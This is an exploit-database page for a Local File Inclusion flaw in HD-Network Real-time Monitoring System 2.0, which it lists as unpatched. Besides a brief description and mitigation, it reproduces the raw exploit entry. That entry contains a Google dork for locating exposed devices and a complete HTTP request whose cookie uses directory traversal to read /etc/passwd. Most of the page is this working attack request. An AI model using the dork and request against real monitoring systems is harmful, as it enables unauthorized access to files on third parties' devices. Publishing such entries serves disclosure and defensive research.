header-logo
Suggest Exploit
vendor:
HD-Network Real-time Monitoring System
by:
Momen Eldawakhly (Cyber Guy)
9.8
CVSS
CRITICAL
Local File Inclusion (LFI)
22
CWE
Product Name: HD-Network Real-time Monitoring System
Affected Version From: V2.0
Affected Version To: V2.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Nginx NVRDVRIPC Web Server
2021

HD-Network Real-time Monitoring System 2.0 – Local File Inclusion (LFI)

A Local File Inclusion (LFI) vulnerability exists in HD-Network Real-time Monitoring System 2.0. An attacker can send a specially crafted HTTP request to the vulnerable server to exploit this vulnerability and gain access to sensitive files on the server.

Mitigation:

To mitigate this vulnerability, the application should validate user input and restrict access to sensitive files.
Source

Exploit-DB raw data:

# Exploit Title: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)
# Google Dork: intitle:"HD-Network Real-time Monitoring System V2.0"
# Date: 11/12/2021
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: N/A
# Version: V2.0
# Tested on: Nginx NVRDVRIPC Web Server

Proof of Concept:

GET /language/lang HTTP/1.1
Referer: http://example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: VulnIP
Connection: Keep-alive